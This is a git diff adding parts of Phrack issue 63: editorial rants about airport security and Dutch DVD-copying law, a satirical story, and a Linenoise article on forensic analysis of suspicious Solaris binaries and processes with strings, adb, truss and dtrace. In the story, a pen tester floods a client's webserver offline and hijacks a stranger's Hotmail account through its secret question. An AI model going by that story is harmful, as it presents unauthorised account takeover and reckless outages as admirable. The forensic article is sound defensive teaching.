+4) People get fucked by what the policticans told them would help
+   against terror.
+
+Ladies and Gentlemen, the TSA-FUCKUP:
+http://www.komotv.com/stories/37150.htm
+
+I love this quote: And I said what about my constitutional rights? And
+they said 'not at this point ... you don't have any'."
+
+---
+
+DVD copy software illegal in the netherlands.
+http://www.theregister.co.uk/2005/07/25/dvd_copy/
+http://www.theregister.co.uk/2005/07/25/uk_war_driver_fined/
+
+Wait a moment? The software? I would even protest if it would
+be the act of copying. But the software? What fuckup is this?
+
+1) I buy a DVD
+2) I buy software to copy DVD
+3) I make a copy of my OWN DVD for MY OWN purpose
+4) I make a copy of my OWN DVD for my FRIEND
+5) I make a copy of my friends DVD for MY FRIEND
+6) I make a copy of my friends DVD for ME
+7) I make MANY copies of my friends DVD for OTHERS
+
+So where does warez trading start? Netherlands, that was a bad move. The
+people of the Netherlands are not stupid. They will never allow you to
+forbid them to make a copy of their own DVDs. And for sure you will never
+ever be able to forbid them to develop and research software to copy
+DVDs or any other software.
+
+Other countries would have sponsored smart guys who can write such software.
+The people of the Netherlands will fight for their rights. Free speech & free
+research will win in the end.
+
+---
+
+|=-------=---------------------------------------------------------------=|
+|=[ Social Penetration Testing ]=----------------------------------------=|
+|=-------=---------------------------------------------------------------=|
+
+
+By Pascal Cretain (Pascal_Cretain@mail.com)
+ 
+I' say with certainty that the MD5 checksum of each and every one of the
+last, say 200 days has not been tampered with and is the same in all cases.
+It's yet another dull day in the office and I'm bored out of my f***ing skull.
+This new client not only wants an 'external blind pen test' they also want
+'comprehensive static code analysis'. Why they are paying money to 'secure'
+this monstrosity is beyond me. It doesn't even have an authentication
+section. Bollocks.
+
+A DNS zone transfer request greets me cheerfully with all their internal
+network structure...not that I will need that since they have only asked
+for webserver testing but it's good to know anyway. I launch that damn
+nessus scan for the millionth time and I senselessly wait for the attack
+progress bar to complete'no joy. I fire up Nikto, Webscan, N-Stealth AND
+ISS at the same time enabling all dangerous plugins in an attempt to DoS
+this ugly webserver, certainly not running Free/GNU open source software
+but something proprietary and expensive starting from I and ending in IS.
+In addition to that I launch independent SYN FLOOD attacks and distributed
+teardroping to improve my chances of achieving the goal. Soon, the website
+falls clumsily like a non-armoured villager in the battle of Waterloo.
+
+I smile with content as the overbloated, dysmorphic, dynamic html pages are
+soon replaced with a plain, powerful, beautiful and snowy white 404 error.
+A minute of silence and peace is instantly shattered by the phone ringing.
+It's the operations manager. 
+
+- Pascal, they people from Dorksershire_Upon_Avon just called me complaining
+  that the website is down. Does that have something to do with the pen
+  testing we perform?
+
+- Well , partially yes, I respond. And then, more aggressively I explain
+  "If the client wants a penetration test to be complete they have to get
+  their website tested against Denial Of Service Attacks, the most innocuous
+  and common type of attack nowadays. They will thank us for that,
+  eventually. Moreover, we had warned them about the danger of DoS when
+  they signed the contract. Despite the fact that we take every precaution
+  to avoid such a side-effect, DoS is a risk that comes bundled with proper
+  testing. I clearly remember that sales guy. He'd thought that with the
+  term DoS I meant that black, command-line pre-windows OS, the one that
+  emptied the screen when you typed CLS. Oh well.
+
+- Thank you Pascal, I will inform them. 
+
+It's already 4+30...I'd like to escape earlier today, especially now, after
+the DoS unfortunate 'incident' that has put a temporary pause to our duties
+I can't do much.
+
+The operations manager is now gone, or he might even be in the loo, who
+cares, now is my ultimate chance to scram. Within seconds, literally, I'm
+sitting right in the middle of the 'Thirsty Fox' pub. Oooh I love this
+place. 
+
+- Pint of John Smith's please
+- Sure mate
+- Cheers
+- Cheers
+
+A fractal amount of ale gets spilled over the counter
+
+- Sorry
+- Sorry
+- That's all right mate
+- Cheers
+- Cheers
+
+I grab the glass and drink half of the beer in one go. Then I look around
+for female presence vulnerable to man in the middle attack. Equipped with
+my brand new 'penetration testing anyone?' t-shirt, I can't lose.
+There she is! Black hair, my type. I down the rest of my drink, order
+another pint. 
+
+- Pint of John Smith's please
+- Sure mate
+- Cheers 
+- Cheers
+I Grab the glass and make my move. 
+- Hey
+- Hiya. 
+- You come here often? I say with an epic voice
+- Yeah , quite often she responds uninterested
+- You know, I'm a penetration tester. My voice is deep and certainly erotic. 
+- *Silence*
+- I'm a hacker, I say, and I get paid to do it.
+- Ha. That's interesting. Do you hack hotmail? 
+- Of course, I respond confidently. I'm a Hotmail Hacking Certified Reverse
+  Engineer and president of the British Open Source institute for
+  ...mm...E-mail Compromise (HHCRE&PBOSIEC)
+- Wow, she says impressed. Could you offer me your valuable help then please?
+  There is a particular email account that I have forgotten the password for
+  and has critical information for me. The account is
+  Brutus_Needham@hotmail.com...Would you help me hack it?
+- Sure, no worries. Why don't we finish these drinks and be gone, I live
+  nearby. In my place I got 1Gb Download/512MB X-DSL access, 3 workstations
+  and 2 mainframes running different command-line OSs. In the worst case
+  scenario, we can always run a distributed john the ripper dictionary attack
+  using my VERY LONG AND THICK dictionaries, I say in an attempt to impress.
+  The girl is moving her head, looking somehow puzzled. We'll sort out your
+  situation in a jiffy, I add to simplify things. Say, how can this be your
+  email account, tho'? isn't that a man's name? I say while blinking at the
+  same time.
+- Well. _blush_ ok you got me! It's my darn ex boyfriend and I have to find
+  out what he has been doing! If you don' mind.
+- No worries, we can take care of that. I'm glad I can be of assistance.
+  Your female friend can join us as well if she feels like a 'small
+  penetrating class' free of charge!, I say, while making some fast, and
+  certainly erotic & meaningful gestures. 
+- Yeah, why not! sounds like fun! , both girls reply.
+- Bingo. Let's get to some real penetration testing, I think to myself while
+  smiling. 
+
+I don't own a car since I believe that it's a good idea not to acquire
+products that will make your life more stressful and costly. Why pay car
+insurance, petrol and refrain one's self from the wonderful act of drinking
+John Smith's when you can use public transport completely wasted, or walk,
+or cycle (wasted). Generally, I consider that people should only buy goods
+that they absolutely need. An oscilloscope, for instance, is an example of
+an absolutely necessary device, that's why I own two of them. Other than
+that, not owning things provides the luxury of being flexible, free, and
+ensures you tread lightly on this earth. Anywayz. 
+
+So we walk home, myself in the middle , girls on both sides.
+
+- So, what's your name, hacker? One of the girls asks.
+- Pascal, I reply. Pascal Cretain. 
+- Ha, this is not a very usual name. Where do you come from , Pascal? 
+- I come from the land of Compromise. I respond, looking at the void. 
+- You are an interesting one, Pascal. I honestly hope you're not
+  bullshiting around with us. 
+- As a true hacker, I will speak with actions and not with useless words,
+  I say. Just wait till we crack that Brutus who needs ham, girl. 
+
+Soon, all three of us are sitting comfortably in my messy 'IT room'. One
+of the girls asks: 
+
+- Hey, where is your equipment mate? Didn't you say you had five computers
+  with X-LSD internet? All I can see is a shitty laptop! What's going on?
+  And where is the LSD? 
+
+- Don't worry honey, I reply with a calm voice. My computer equipment is all
+  here. But not quite. This laptop basically is the access point to my REAL
+  IT infrastructure, which resides somewhere near - very near. Unfortunately,
+  due to non-disclosure confidentiality agreements, I cannot inform you of
+  the real location of my computers, nor show you around, tho' I'd love
+  to - sigh. The girls are gazing at me, unconvinced
+
+- Oh well , whatever. D'you have anything we can drink then?
+
+- Sure, I got John Smith's premium Ale. They grab a can each and start
+  chatting about online shopping. 
+
+I grab a can and quickly get to work . I browse to passport.net, then reset
+password, choose country, type in the username....wait for the Brutus'
+'Secret' question. Fuck yeah!
+
+- Hey, girl, you didn't tell me your name. I ask the 'interested party'.
+  'Jude' she responds..I type in the answer to Brutus's secret question,
+  then reset the password to 'Oscilloscoped' 
+- Mine is Gloria , the other girl says.
+- Hey Jude, I says. Wanna come over here? I got somethin' for you. Fact I
+  got two. I blink. 
+
+Both girls approach. I sit back and smile.
+It's not such a bad day after all.
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack63/3.txt b/phrack63/3.txt
new file mode 100644
index 0000000..9f8ce7d
--- /dev/null
+++ b/phrack63/3.txt
@@ -0,0 +1,2544 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x03 of 0x14
+
+|=---------------------=[ L I N E N O I S E ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ phrack staff ]=-----------------------------=|
+
+...all that does not fit anywhere else but which is worth beeing mentioned
+in our holy magazine.... enjoy linenoise.
+
+0x03-1 Analysing suspicious binary files                  by Boris Loza
+0x03-2 TCP Timestamp to count hosts behind NAT            by Elie aka Lupin
+0x03-3 Elliptic Curve Cryptography                        by f86c9203
+
+|=-------------------------=[ 0x03-1 ]=----------------------------------=|
+|=---------Analyzing Suspicious Binary Files and Processes---------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------By Boris Loza, PhD------------------------------=|
+|=-------------------bloza@tegosystemonline.com--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+1. Introduction
+2. Analyzing a 'strange' binary file
+3. Analyzing a 'strange' process
+4. Security Forensics using DTrace
+5. Conclusion
+
+--[ Introduction
+
+The art of security forensics requires lots of patience, creativity and
+observation. You may not always be successful in your endeavours but
+constantly 'sharpening' your skills by hands-on practicing, learning a
+couple more things here and there in advance will definitely help.  
+
+In this article I'd like to share my personal experience in analyzing
+suspicious binary files and processes that you may find on the system. We
+will use only standard, out of the box, UNIX utilities. The output for all
+the examples in the article is provided for Solaris OS.
+
+--[ Analyzing a 'strange' binary file
+
+During your investigation you may encounter some executable (binary) files
+whose purpose in your system you don't understand. When you try to read
+this file it displays 'garbage'. You cannot recognize this file by name
+and you are not sure if you saw it before. 
+
+Unfortunately, you cannot read the binary file with more, cat, pg, vi or
+other utilities that you normally use for text files. You will need other
+tools. In order to read such files, I use the following tools: strings,
+file, ldd, adb, and others.
+
+Let's assume, for example, that we found a file called cr1 in the /etc
+directory. The first command to run on this file is strings(1). This will
+show all printable strings in the object or binary file:
+
+$ strings cr1 | more
+                                       
+%s %s %s%s%s -> %s%s%s (%.*s)                                    
+Version: 2.3                                                     
+Usage: dsniff [-cdmn] [-i interface] [-s snaplen] [-f services]  
+              [-t trigger[,...]] [-r|-w savefile] [expression]   
+...
+/usr/local/lib/dsniff.magic                                      
+/usr/local/lib/dsniff.services 
+...
+
+The output is very long, so some of it has been omitted. But you can see
+that it shows that this is actually a dsniff tool masquerading as cr1. 
+
+Sometimes you may not be so lucky in finding the name of the program,
+version, and usage inside the file. If you still don't know what this file
+can do, try to run strings with the 'a' flag, or just '-'. With these
+options, strings will look everywhere in the file for strings. If this flag
+is omitted, strings only looks in the initialized data space of the object
+file: 
+
+$ strings cr1 | more  
+
+Try to compare this against the output from known binaries to get an idea
+of what the program might be. 
+
+Alternatively, you can use the nm(1) command to print a name list of an
+object file:
+
+$ /usr/ccs/bin/nm -p cr1 | more                                    
+                                                         
+cr1:                                                          
+                                                             
+[Index]   Value    Size  Type    Bind  Other   Shndx       Name  
+[180]     |0     |    0| FILE |  LOCL | 0     |ABS |       decode_smtp.c       
+[2198]    |160348|  320| FUNC |  GLOB | 0     | 9  |       decode_sniffer   
+   
+Note that the output of this command may contain thousands of lines,
+depending on the size of the object file. You can run nm through pipe to
+more or pg, or redirect the output to the file for further analysis.
+
+To check the runtime linker symbol table - calls of shared library routines,
+use nm with the '-Du' options, where -D displays the symbol table used by
+ld.so.1 and is present even in stripped dynamic executables, and -u prints
+a long listing for each undefined symbol.
+
+You can also dump selected parts of any binary file with the dump(1) or
+elfdump(1) utilities. The following command will dump the strings table of
+cr1 binary:
+
+$ /usr/ccs/bin/dump -c ./cr1 | more
+
+You may use the following options to dump various parts of the file:
+-c       Dump the string table(s).
+-C       Dump decoded C++ symbol table names.
+-D       Dump debugging information.
+-f       Dump each file header.
+-h       Dump the section headers.
+-l       Dump line number information.
+-L       Dump dynamic linking information and static shared library
+         information, if available.
+-o       Dump each program execution header.
+-r       Dump relocation information.
+-s       Dump section contents in hexadecimal.
+-t       Dump symbol table entries.
+
+Note: To display internal version information contained within an ELF file,
+use the pvs(1) utility.
+
+If you are still not sure what the file is, run the command file(1):
+
+$ file cr1
+cr1:         ELF 32-bit MSB executable SPARC32PLUS Version 1, V8+ 
+Required, UltraSPARC1 Extensions Required, dynamically linked, not 
+stripped    
+            
+Based on this output, we can tell that this is an executable file for SPARC
+that requires the availability of libraries loaded by the OS (dynamically
+linked). This file also is not stripped, which means that the symbol tables
+were not removed from the compiled binary. This will help us a lot when we
+do further analysis.
+
+Note: To strip the symbols, do strip <my_file>.
+
+The file command could also tell us that the binary file is statically
+linked, with debug output or stripped. 
+
+Statically linked means that all functions are included in the binary, but
+results in a larger executable. Debug output - includes debugging symbols,
+like variable names, functions, internal symbols, source line numbers, and
+source file information. If the file is stripped, its size is much smaller.
+
+The file command identifies the type of a file using, among other tests, a
+test for whether the file begins with a certain magic number (see the
+/etc/magic file). A magic number is a numeric or string constant that
+indicates the file type. See magic(4) for an explanation of the format of
+/etc/magic.    
+                                      
+If you still don't know what this file is used for, try to guess this by
+taking a look at which shared libraries are needed by the binary using
+ldd(1) command:
+
+$ ldd cr1                                      
+...
+libsocket.so.1 =>       /usr/lib/libsocket.so.1 
+librpcsvc.so.1 =>       /usr/lib/librpcsvc.so.1 
+...
+
+This output tells us that this application requires network share libraries 
+(libsocket.so.1 and librpcsvc.so.1). 
+ 
+The adb(1) debugger can also be very useful. For example, the following
+output shows step-by-step execution of the binary in question:
+
+# adb cr1
+:s
+adb: target stopped at:
+ld.so.1`_rt_boot:       ba,a      +0xc          
+<ld.so.1`_rt_boot+0xc>
+,5:s
+adb: target stopped at:
+ld.so.1`_rt_boot+0x58:  st        %l1, [%o0 + 8]
+
+You can also analyze the file, or run it and see how it actually works. But
+be careful when you run an application because you don't know yet what to
+expect. For example:
+
+# adb cr1
+:r
+Using device /dev/hme0 (promiscuous mode)
+192.168.2.119 -> web      TCP D=22 S=1111 Ack=2013255208 
+Seq=1407308568 Len=0 Win=17520
+     web -> 192.168.2.119 TCP D=1111 S=22 Push Ack=1407308568 
+
+We can see that this program is a sniffer. See adb(1) for more information
+of how to use the debugger.
+
+If you decide to run a program anyway, you can use truss(1). The truss
+command allows you to run a program while outputting system calls and
+signals. 
+
+Note: truss produces lots of output. Redirect the output to the file:
+
+$ truss -f -o cr.out ./cr1
+listening on hme0
+^C
+$
+
+Now you can easily examine the output file cr.out. 
+
+As you can see, many tools and techniques can be used to analyze a strange
+file. Not all files are easy to analyze. If a file is a statically linked
+stripped binary, it would be much more difficult to find what a file
+(program) is up to. If you cannot tell anything about a file using simple
+tools like strings and ldd, try to debug it and use truss. Experience using
+and analyzing the output of these tools, together with a good deal of 
+patience, will reward you with success.  
+
+--[ Analyzing a 'strange' process
+
+What do you do if you find a process that is running on your system, but
+you don't know what it is doing? Yes, in UNIX everything is a file, even a
+process! There may be situations in which the application runs on the
+system but a file is deleted. In this situation the process will still run
+because a link to the process exists in the /proc/[PID]/object/a.out
+directory, but you may not find the process by its name running the find(1)
+command. 
+
+For example, let's assume that we are going to investigate the process
+ID 22889 from the suspicious srg application that we found running on our
+system:
+
+# ps -ef | more                                              
+UID   PID  PPID  C    STIME TTY      TIME CMD         
+...
+root 22889 16318  0 10:09:25 pts/1    0:00 ./srg
+...
+ 
+Sometimes it is as easy as running the strings(1) command against the 
+/proc/[PID]/object/a.out to identify the process.
+
+# strings /proc/22889/object/a.out | more  
+...
+TTY-Watcher version %s                                                        
+Usage: %s [-c]                                                                
+-c   turns on curses interface                                                
+NOTE: Running without root privileges will only allow you to monitor 
+yourself.
+...
+
+We can see that this command is a TTY-Watcher application that can see all 
+keystrokes from any terminal on the system. 
+
+Suppose we were not able to use strings to identify what this process is
+doing. We can examine the process using other tools.
+
+You may want to suspend the process until you will figure out what it is.
+For example, run kill -STOP 22889 as root. Check the results. We will look
+for 'T' which indicates the process that was stopped:
+
+# /usr/ucb/ps | grep T
+root     22889  0.0  0.7 3784 1720 pts/1    T 10:09:25  0:00 ./srg 
+
+Resume the process if necessary with kill -CONT <PID>
+To further analyze the process, we will create a \core dump\ of variables
+and stack of the process:
+
+# gcore 22889            
+gcore: core.22889 dumped 
+
+Here, 22889 is the process ID (PID). Examine results of the core.22889 with 
+strings:
+
+# strings core.22889 | more                           
+...                                  
+TTY-Watcher version %s                                                        
+Usage: %s [-c]                                                                
+-c   turns on curses interface                                                
+NOTE: Running without root privileges will only allow you to monitor 
+yourself.
+...
+
+You may also use coreadm(1M) to analyze the core.22889 file. The coreadm
+tool provides an interface for managing the parameters that affect core
+file creation. The coreadm command modifies the /etc/coreadm.conf file.
+This file is read at boot time and sets the global parameters for core
+dump creation.
+
+First, let's set our core filenames to be of the form core.<PROC NAME>.<PID>.
+We'll do this only for all programs we execute in this shell (the $$
+notation equates to the PID of our current shell):
+
+$ coreadm -p core.%f.%p $$
+
+The %f indicates that the program name will be included, and the %p
+indicates that the PID will be appended to the core filename.
+
+You may also use adb to analyze the process. If you don't have the object
+file, use the /proc/[PID]/object/a.out. You can use a core file for the
+process dumped by gcore or specify a '-' as a core file. If a dash (-) is
+specified for the core file, adb will use the system memory to execute the
+object file. You can actually run the object file under the adb control (it
+could also be dangerous because you don't know for sure what this
+application is supposed to do!): 
+
+# adb /proc/22889/object/a.out -                 
+main:b                                           
+:r                                               
+breakpoint at:                                   
+main:           save    %sp, -0xf8, %sp          
+...
+:s                                       
+stopped at:                              
+main+4:         clr     %l0              
+:s                                       
+stopped at:                              
+main+8:         sethi   %hi(0x38400), %o0
+$m                                                                              
+? map                                                                           
+...
+b11 = ef632f28 e11 = ef6370ac f11 =   2f28 `/usr/lib/libsocket.so.1'            
+$q 
+                                                            
+We start the session by setting a breakpoint at the beginning of main() and
+then begin execution of a.out by giving adb the ':r' command to run.
+Immediately, we stop at main(), where our breakpoint was set. Next, we list
+the first instruction from the object file. The ':s' command tells adb to
+step, executing only one assembly instruction at a time. 
+
+Note: Consult the book Panic!, by Drake and Brown, for more information on
+how to use adb to analyze core dumps.
+
+To analyze the running process, use truss:
+
+# truss -vall -f -o /tmp/outfile -p 22889
+# more /tmp/outfile
+
+On other UNIX systems, where available, you may trace a process by using the
+ltrace or strace commands. To start the trace, type ltrace -p <PID>.
+
+To view the running process environment, you may use the following:
+
+# /usr/ucb/ps auxeww 22889                                                       
+USER       PID %CPU %MEM   SZ  RSS TT       S    START  TIME COMMAND            
+root      22889  0.0  0.4 1120  896      pts/1    S 14:15:27  0:00 -
+sh _=/usr/bin/csh 
+MANPATH=/usr/share/man:/usr/local/man HZ= 
+PATH=/usr/sbin:/usr/bin:/usr/local/bin:/usr/ccs/bin:/usr/local/sbin:
+/opt/NSCPcom/ LOGNAME=root SHELL=/bin/ksh HOME=/ 
+LD_LIBRARY_PATH=/usr/openwin/lib:/usr/local/lib TERM=xterm  TZ= 
+
+The /usr/ucb directory contains SunOS/BSD compatibility package commands. The
+/usr/ucb/ps command displays information about processes. We used the
+following options (from the man for ps(1B)):
+
+-a        Include information about processes owned by others.
+-u        Display user-oriented output. This includes fields USER, %CPU,o
+          %MEM, SZ, RSS and START as described below. 
+-x        Include processes with no controlling terminal. 
+-e        Display the environment as well as the arguments to the command.  
+-w        Use a wide output format (132 columns rather than 80); if repeated,
+          that is, -ww, use arbitrarily wide output. This information is
+          used to decide how much of long commands to print. 
+
+To view the memory address type:
+
+# ps -ealf | grep 22889
+ F S      UID   PID  PPID  C PRI NI     ADDR     SZ    WCHAN    
+STIME    TTY      TIME CMD
+8 S     root  3401  22889  0  41 20 615a3b40  474 60ba32e6 14:16:49 
+pts/1    0:00 ./srg   
+
+To view the memory usage, type:
+
+# ps -e -opid,vsz,rss,args 
+  PID  VSZ  RSS COMMAND                           
+...
+ 22889 3792 1728 ./srg
+
+We can see that the ./srg uses 3,792 K of virtual memory, 1,728 of which
+have been allocated from physical memory. 
+
+You can use the /etc/crash(1M) utility to examine the contents of a proc
+structure of the running process:
+
+# /etc/crash                                                                  
+dumpfile = /dev/mem, namelist = /dev/ksyms, outfile = stdout                  
+> p                                                                           
+PROC TABLE SIZE = 3946                                                        
+SLOT ST  PID  PPID  PGID   SID   UID PRI   NAME        FLAGS                  
+...
+  66 s 22889 16318 16337 24130     0  58 srg            load            
+> p -f 66                                                               
+PROC TABLE SIZE = 3946                                                  
+SLOT ST  PID  PPID  PGID   SID   UID PRI   NAME        FLAGS            
+  66 s 22889 16318 16337 24130     0  58 srg            load            
+                                                                        
+        Session: sid: 24130, ctty: vnode(60b8f3ac) maj(  24) min(  1) 
+        ...                                                
+>   
+ 
+After invoking the crash utility, we used the p function to get the process
+table slot (66, in this case). Then, to dump the proc structure for process
+PID 22889, we again used the p utility, with the '-f' flag and the process
+table slot number.
+
+Like the process structure, the uarea contains supporting data for signals,
+including an array that defines the disposition for each possible signal.
+The signal disposition tells the operating system what to do in the event
+of a signal - ignore it, catch it and invoke a user-defined signal handler,
+or take the default action. To dump a process's uarea:
+
+> u 66                                                              
+PER PROCESS USER AREA FOR PROCESS 66                                
+PROCESS MISC:                                                       
+        command: srg, psargs: ./srg                                 
+        start: Mon Jun  3 08:56:40 2002                             
+        mem: 6ad, type: exec su-user                                
+        vnode of current directory: 612daf48                        
+...
+> 
+ 
+The 'u' function takes a process table slot number as an argument.
+To dump the address space of a process, type:
+
+# /usr/proc/bin/pmap -x 22889
+                                                  
+To obtain a list of process's open files, use the /usr/proc/bin/pfiles
+command:
+
+# /usr/proc/bin/pfiles 22889   
+                                       
+The command lists the process name and PID for the process' open files. Note
+that various bits of information are provided on each open file, including
+the file type, file flags, mode bits, and size.
+
+If you cannot find a binary file and the process is on the memory only, you
+can still use methods described for analyzing suspicious binary files above
+against the process's object file. For example:
+
+# /usr/ccs/bin/nm a.out | more        
+a.out:                                                     
+                                                           
+[Index]   Value      Size    Type  Bind  Other Shndx   Name
+...       
+[636]   |    232688|       4|OBJT |GLOB |0    |17     |Master_utmp  
+[284]   |    234864|      20|OBJT |GLOB |0    |17     |Mouse_status 
+
+You may also use mdb(1) - a modular debugger to analyze the process:
+
+# mdb -p 22889
+Loading modules: [ ld.so.1 libc.so.1 libnvpair.so.1 libuutil.so.1 ]
+> ::objects
+    BASE    LIMIT     SIZE NAME
+   10000    62000    52000 ./srg
+ff3b0000 ff3dc000    2c000 /lib/ld.so.1
+ff370000 ff37c000     c000 /lib/libsocket.so.1
+ff280000 ff312000    92000 /lib/libnsl.so.1
+
+--[ Security Forensics using DTrace
+
+Solaris 10 has introduced a new tool for Dynamic Tracing in the OS
+environment - dtrace. This is a very powerful tool that allows system
+administrators to observe and debug the OS behaviour or even to dynamically
+modify the kernel. Dtrace has its own C/C++ like programming language called
+'D language' and comes with many different options that I am not going to
+discuss here. Consult dtrace(1M) man pages and
+http://docs.sun.com/app/docs/doc/817-6223 for more information.
+
+Although this tool has been designed primarily for developers and
+administrators, I will explain how one can use dtrace for analyzing
+suspicious files and process. 
+
+We will work on a case study, as followes. For example, let's assume that we
+are going to investigate the process ID 968 from the suspicious srg
+application that we found running on our system. 
+
+By typing the following at the command-line, you will list all files that
+this particular process opens at the time of our monitoring. Let it run for
+a while and terminate with Control-C:
+
+# dtrace -n syscall::open:entry'/pid == 968/ 
+{ printf("%s%s",execname,copyinstr(arg0)); }'
+
+dtrace: description 'syscall::open*:entry' matched 2 probes
+^C
+CPU     ID                    FUNCTION:NAME
+  0     14                    open:entry srg /var/ld/ld.config
+  0     14                    open:entry srg /lib/libdhcputil.so.1
+  0     14                    open:entry srg /lib/libsocket.so.1
+  0     14                    open:entry srg /lib/libnsl.so.1
+
+D language comes with its own terminology, which I will try to address here 
+briefly. 
+
+The whole 'syscall::open:entry' construction is called a 'probe' and 
+defines a location or activity to which dtrace binds a request to perform
+a set of 'actions'. The 'syscall' element of the probe is called a 'provider'
+and, in our case, permits to enable probes on 'entry' (start) to any 'open'
+Solaris system call ('open' system call instracts the kernel to open a file
+for reading or writing). 
+
+The so-called 'predicate' - /pid == 968/ uses the predefined dtrace
+variable 'pid', which always evaluates to the process ID associated with
+the thread that fired the corresponding probe. 
+
+The 'execname' and 'copyinstr(arg0)' are called 'actions' and define the
+name of the current process executable file and convert the first integer
+argument of the system call (arg0) into a string format respectively. The
+printf's action uses the same syntax as in C language and serves for the
+same purpose - to format the output. 
+
+Each D program consists of a series of 'clauses', each clause describing one
+or more probes to enable, and an optional set of actions to perform when the
+probe fires. The actions are listed as a series of statements enclosed in
+curly braces { } following the probe name. Each statement ends with a
+semicolon (;).
+
+You may want to read the Introduction from Solaris Tracing Guide 
+(http://docs.sun.com/app/docs/doc/817-6223) for more options and to
+understand the syntax.
+
+Note: As the name suggests, the dtrace (Dynamic Trace) utility will show you
+the information about a chnaging process - in dynamic. That is, if the
+process is idle (doesn't do any system calls or opens new files), you won't
+be able to get any information. To analyze the process, either restart it or
+use methods described in the previous two sections of this paper.
+
+Second, we will use the following command-line construction to list all
+system calls for 'srg'. Let it run for a while and terminate by Control-C:
+
+# dtrace -n 'syscall:::entry /execname == "srg"/ { @num[probefunc] = 
+count(); }'
+dtrace: description 'syscall:::entry ' matched 226 probes
+^C
+  pollsys                                                   1
+  getrlimit                                                 1
+  connect                                                   1
+  setsockopt                                                1
+...
+
+You may recognize some of the building elements of this small D program. In 
+addition, this clause defines an array named 'num' and assigns the
+appropriate member 'probefunc' (executed system call's function) the namber
+of times these particular functions have been called (count()).  
+ 
+Using dtrace we can easily emulate all utilities we have used in the
+previous sections to analyze suspicious binary files and processes. But
+dtrace is much more powerful tool and may provide one with more
+functionality: for example, you can dynamically monitor the stack of the
+process in question:
+
+# dtrace -n 'syscall:::entry/execname == "srg"/{ustack()}'
+  0    286                lwp_sigmask:entry
+              libc.so.1`__systemcall6+0x20
+              libc.so.1`pthread_sigmask+0x1b4
+              libc.so.1`sigprocmask+0x20
+              srg`srg_alarm+0x134
+              srg`scan+0x400
+              srg`net_read+0xc4
+              srg`main+0xabc
+              srg`_start+0x108
+
+Based on all our investigation (see the list of opened files, syscalls,
+and the stack examination above), we may positively conclude that srg is a
+network based application. Does it write to the network? Let's check it by
+constructing the following clause:
+
+# dtrace -n 'mib:ip::/execname == "srg"/{@[execname]=count()}'
+dtrace: description 'mib:ip::' matched 412 probes
+dtrace: aggregation size lowered to 2m
+^C
+  srg                                      520
+
+It does. We used 'mib' provider to find out if our application transmits
+to the network.
+
+Could it be just a sniffer or a netcat-liked application that is bounded
+to a specific port? Let's run dtrace in the truss(1) like fashion to answer
+this question (inspired by Brendan Gregg's dtruss utility ):
+
+#!/usr/bin/sh
+#
+dtrace='
+
+ inline string cmd_name = "'$1'";
+ /*
+ **  Save syscall entry info
+ */
+ syscall:::entry
+ /execname == cmd_name/
+ {
+      /* set start details */
+      self->start = timestamp;        
+      self->arg0 = arg0;
+      self->arg1 = arg1;
+      self->arg2 = arg2;
+ }
+
+/* Print data */
+ syscall::write:return,
+ syscall::pwrite:return,
+ syscall::*read*:return
+ /self->start/
+ {
+    printf("%s(0x%X, \"%S\", 0x%X)\t\t = %d\n",probefunc,self->arg0,
+    stringof(copyin(self->arg1,self->arg2)),self->arg2,(int)arg0);
+       
+      self->arg0 = arg0;
+      self->arg1 = arg1;
+      self->arg2 = arg2;
+
+ }
+'
+# Run dtrace
+        /usr/sbin/dtrace -x evaltime=exec -n "$dtrace" >&2
+
+Save it as truss.d, change the permissions to executable and run:
+
+# ./truss.d srg
+0     13                     write:return write(0x1, "       sol10 -
+> 192.168.2.119 TCP D=3138 S=22 Ack=713701289 Seq=3755926338 Len=0 
+Win=49640\n8741 Len=52 Win=16792\n\0", 0x5B)                 = 91
+0     13                     0     13                     
+write:return write(0x1, "192.168.2.111 -> 192.168.2.1  UDP D=1900 
+S=21405 LEN=140\n\0", 0x39)          = 57
+^C
+
+Looks like a sniffer to me, with probably some remote logging (remember the
+network transmission by ./srg discovered by the 'mib' provider above!). 
+
+You can actually write pretty sophisticated programs for dtrace using D
+language. 
+
+Take a look at /usr/demo/dtrace for some examples.
+
+You may also use dtrace for other forensic activities. Below is an example
+of more complex script that allows monitoring of who fires the suspicious
+application and starts recording of all the files opened by the process:
+
+#!/usr/bin/sh
+
+command=$1
+
+/usr/sbin/dtrace -n '
+
+inline string COMMAND  = "'$command'";
+
+ #pragma D option quiet
+ 
+ /*
+ **  Print header
+ */
+ dtrace:::BEGIN
+ {
+     /* print headers */
+     printf("%-20s %5s %5s %5s %s\n","START_TIME","UID","PID","PPID","ARGS");
+ }
+
+ /*
+ **  Print exec event
+ */
+ syscall::exec:return, syscall::exece:return
+ /(COMMAND == execname)/
+ {
+        /* print data */
+        printf("%-20Y %5d %5d %5d %s\n",walltimestamp,uid,pid,ppid,
+        stringof(curpsinfo->pr_psargs));
+        s_pid = pid;
+ }
+/*
+ **  Print open files
+ */
+ syscall::open*:entry
+/pid == s_pid/
+ {
+        printf("%s\n",copyinstr(arg0));
+ }
+' 
+
+Save this script as wait.d, change the permissions to executable
+'chmod +x wait.d' and run:
+
+# ./wait.d srg
+START_TIME             UID   PID  PPID ARGS
+2005 May 16 19:51:20   100  1582  1458 ./srg
+
+/var/ld/ld.config
+/lib/libnsl.so.1
+/lib/libsocket.so.1
+/lib/libresolv.so.2
+...
+^C
+
+Once the srg is started you will see the output. 
+
+However, the real power of dtrace comes from the fact that you can do
+things with it that won't be possible without writing a comprehensive
+C program. For example, the shellsnoop application written by Brendan Gregg 
+(http://users.tpg.com.au/adsln4yb/DTrace/shellsnoop) allows you to use
+dtrace at the capacity of ttywatcher!
+
+It is not possible to show all capabilities of dtrace in such a small
+presentation of this amazing utility. Dtrace is a very powerful as well a
+complex tool with virtually endless capabilities. Although Sun insists that
+you don't have to have a 'deep understanding of the kernel for DTrace to be
+useful', the knowledge of Solaris internals is a real asset. Taking a look
+at the include files in /usr/include/sys/ directory may help you to write
+complex D scripts and give you more of an understanding of how Solaris 10
+is implemented.
+
+--[ Conclusion
+
+Be creative and observant. Apply all your knowledge and experience for
+analyzing suspicious binary files and processes. Also, be patient and have
+a sense of humour!
+
+
+|=-------------------------=[ 0x03-2 ]=----------------------------------=|
